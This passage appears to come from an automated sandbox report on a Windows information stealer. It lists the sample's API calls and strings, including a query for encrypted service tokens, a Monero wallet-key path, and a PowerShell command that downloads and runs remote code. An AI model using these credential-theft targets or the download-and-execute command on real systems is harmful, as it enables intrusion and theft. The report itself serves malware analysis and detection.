                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                      • lstrlen.KERNEL32(00000000), ref: 0073BC9F
                        • Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52
                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0073BCCD
                      • lstrlen.KERNEL32(00000000), ref: 0073BDA5
                      • lstrlen.KERNEL32(00000000), ref: 0073BDB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                      • API String ID: 3073930149-1079375795
                      • Opcode ID: ff4588dac77265bcb210b6365f0c044b8784ff60316af7eeb7f5eeb8efc0dd58
                      • Instruction ID: 22de9ddf7d3a2d86cb0eedfe227bfa362d8bac257b2625bb61d0492c312892d4
                      • Opcode Fuzzy Hash: ff4588dac77265bcb210b6365f0c044b8784ff60316af7eeb7f5eeb8efc0dd58
                      • Instruction Fuzzy Hash: 10B14572950108FBEB05FBA0DD5AEEE737CEF54305F404568F506A6092EF386A49CB62
                      Function 00746770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess$DefaultLangUser
                      • String ID: *
                      • API String ID: 1494266314-163128923
                      • Opcode ID: c842f045d6caf00ce626804cb5671d4477f231b9ea87c1a5eacac519b331a16b
                      • Instruction ID: 766011eda18ac218e44758ca9c852521d05883c34d97e248a023f7ae1c6a92d3
                      • Opcode Fuzzy Hash: c842f045d6caf00ce626804cb5671d4477f231b9ea87c1a5eacac519b331a16b
                      • Instruction Fuzzy Hash: 82F05E32D18209EFD3489FE0E909B6C7B70FB45703F040199E60D86290E6784B82AB97
                      Function 00734FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00734FCA
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00734FD1
                      • InternetOpenA.WININET(00750DDF,00000000,00000000,00000000,00000000), ref: 00734FEA
                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00735011
                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00735041
                      • InternetCloseHandle.WININET(?), ref: 007350B9
                      • InternetCloseHandle.WININET(?), ref: 007350C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                      • String ID:
                      • API String ID: 3066467675-0
                      • Opcode ID: 80595082773bec450f0ee5307837138fa7dc266c2e606eeb0213ec84177b4e33
                      • Instruction ID: 9b4a3867e8092386314e655a3372d4d3b0864bda6fb9c11b7f8b4eb7a2bb79e8
                      • Opcode Fuzzy Hash: 80595082773bec450f0ee5307837138fa7dc266c2e606eeb0213ec84177b4e33
                      • Instruction Fuzzy Hash: 223125B5E04218EBDB24CF54DC85BDCB7B8EB48704F1081D8EA09A7281C7746AC58F99
                      Function 007483DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                      Download Yara Rule
                      APIs
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00748426
                      • wsprintfA.USER32 ref: 00748459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0074847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 0074848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00748499
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                      • RegQueryValueExA.ADVAPI32(00000000,013EDF70,00000000,000F003F,?,00000400), ref: 007484EC
                      • lstrlen.KERNEL32(?), ref: 00748501
                      • RegQueryValueExA.ADVAPI32(00000000,013EDFA0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00750B34), ref: 00748599
                      • RegCloseKey.ADVAPI32(00000000), ref: 00748608
                      • RegCloseKey.ADVAPI32(00000000), ref: 0074861A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                      • String ID: %s\%s
                      • API String ID: 3896182533-4073750446
                      • Opcode ID: 68dd3a54465ff8e3cbf296bb963e99a33fb39865430785cf01ff808e6736384e
                      • Instruction ID: f766363f94364dc84da2182a5c14098b638e5003671648d5861049bacdc99fa6
                      • Opcode Fuzzy Hash: 68dd3a54465ff8e3cbf296bb963e99a33fb39865430785cf01ff808e6736384e
                      • Instruction Fuzzy Hash: 342107B2A1421CABDB64DB54DC85FE9B3B8FB88700F00C198A609A6180DF756A85CFD5
                      Function 00747690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007476A4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 007476AB
                      • RegOpenKeyExA.ADVAPI32(80000002,013DB818,00000000,00020119,00000000), ref: 007476DD
                      • RegQueryValueExA.ADVAPI32(00000000,013EDF88,00000000,00000000,?,000000FF), ref: 007476FE
                      • RegCloseKey.ADVAPI32(00000000), ref: 00747708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: Windows 11
                      • API String ID: 3225020163-2517555085
                      • Opcode ID: babea9b53206cfc9b97fc430fe2492f02360795fbb431c9c7aa9f829efeb43c2
                      • Instruction ID: abef00d574fe159630cb22428049077e7f95abf2d12ec4a0e8e41e96c21487dd
                      • Opcode Fuzzy Hash: babea9b53206cfc9b97fc430fe2492f02360795fbb431c9c7aa9f829efeb43c2
                      • Instruction Fuzzy Hash: 0F0162B6A58204FFD704DBE4DC49FADB7B8EB88701F104454FA08D7291E7749944DB92
                      Function 00747720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747734
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0074773B
                      • RegOpenKeyExA.ADVAPI32(80000002,013DB818,00000000,00020119,007476B9), ref: 0074775B
                      • RegQueryValueExA.ADVAPI32(007476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0074777A
                      • RegCloseKey.ADVAPI32(007476B9), ref: 00747784
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: CurrentBuildNumber
                      • API String ID: 3225020163-1022791448
                      • Opcode ID: 8d549b6b22d2bcdb23726423b012ea17e1b62f06b8b5d72284f72409486389ba
                      • Instruction ID: 93ea107ea263843ae071fe9fcf440cfe4606be264424dec4915fdb5d1745421b
                      • Opcode Fuzzy Hash: 8d549b6b22d2bcdb23726423b012ea17e1b62f06b8b5d72284f72409486389ba
                      • Instruction Fuzzy Hash: C70144F6A54308BBD700DBE0DC49FAEB7B8EB44701F004554FA09A7281DB7455409B92
                      Function 007492E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32(:t,80000000,00000003,00000000,00000003,00000080,00000000,?,00743AEE,?), ref: 007492FC
                      • GetFileSizeEx.KERNEL32(000000FF,:t), ref: 00749319
                      • CloseHandle.KERNEL32(000000FF), ref: 00749327
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CloseCreateHandleSize
                      • String ID: :t$:t
                      • API String ID: 1378416451-3646547331
                      • Opcode ID: 3ac8be224287e149a61ebdfa5d20399056cf12e1643528ba08768250a8da4cb7
                      • Instruction ID: f5f33ad05f0b3c5091b8bee8f453e4813e2e8a5123759b2025bbf5bb3059894c
                      • Opcode Fuzzy Hash: 3ac8be224287e149a61ebdfa5d20399056cf12e1643528ba08768250a8da4cb7
                      • Instruction Fuzzy Hash: 80F04936F58208BBDB14DFB0DC49F9E77B9AB88721F10C254BA55A72C0D774AA419B40
                      Function 007399C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
                      • ReadFile.KERNEL32(000000FF,?,00000000,0073148F,00000000), ref: 00739A5A
                      • LocalFree.KERNEL32(0073148F), ref: 00739A90
                      • CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                      • String ID:
                      • API String ID: 2311089104-0
                      • Opcode ID: 550b92a31332c8c96b2460fe7da762fc796f87f7ff9b6094a6271cc97c11261b
                      • Instruction ID: 989d94641bc933a0d4a66e92b136162bc6c8bdffad80b1ee5e0165d01a9dc33f
                      • Opcode Fuzzy Hash: 550b92a31332c8c96b2460fe7da762fc796f87f7ff9b6094a6271cc97c11261b
                      • Instruction Fuzzy Hash: 19314D74A00209EFEB14DF94C885BEE77F5FF48301F108258E915A7290D778A981DFA1
                      Function 00744780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrcat.KERNEL32(?,013ED838), ref: 007447DB
                        • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00748E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00744801
                      • lstrcat.KERNEL32(?,?), ref: 00744820
                      • lstrcat.KERNEL32(?,?), ref: 00744834
                      • lstrcat.KERNEL32(?,013DAF00), ref: 00744847
                      • lstrcat.KERNEL32(?,?), ref: 0074485B
                      • lstrcat.KERNEL32(?,013ED658), ref: 0074486F
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 00748D90: GetFileAttributesA.KERNEL32(00000000,?,00731B54,?,?,0075564C,?,?,00750E1F), ref: 00748D9F
                        • Part of subcall function 00744570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00744580
                        • Part of subcall function 00744570: RtlAllocateHeap.NTDLL(00000000), ref: 00744587
                        • Part of subcall function 00744570: wsprintfA.USER32 ref: 007445A6
                        • Part of subcall function 00744570: FindFirstFileA.KERNEL32(?,?), ref: 007445BD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                      • String ID:
                      • API String ID: 2540262943-0
                      • Opcode ID: c40e583faaedb26df765b794b4eea598e0170a02cb35052a93bac0d81dd798bd
                      • Instruction ID: e704296fa89582bc2d0f2ae376fc664767e9238103045ee42e71a67cd11a1e96
                      • Opcode Fuzzy Hash: c40e583faaedb26df765b794b4eea598e0170a02cb35052a93bac0d81dd798bd
                      • Instruction Fuzzy Hash: 123156B291020CA7DB54F7B0DC89EED737CAB98700F404589B31996081DF78ABC98B96
                      Function 00742C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00742D85
                      Strings
                      • ')", xrefs: 00742CB3
                      • <, xrefs: 00742D39
                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00742CC4
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00742D04
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
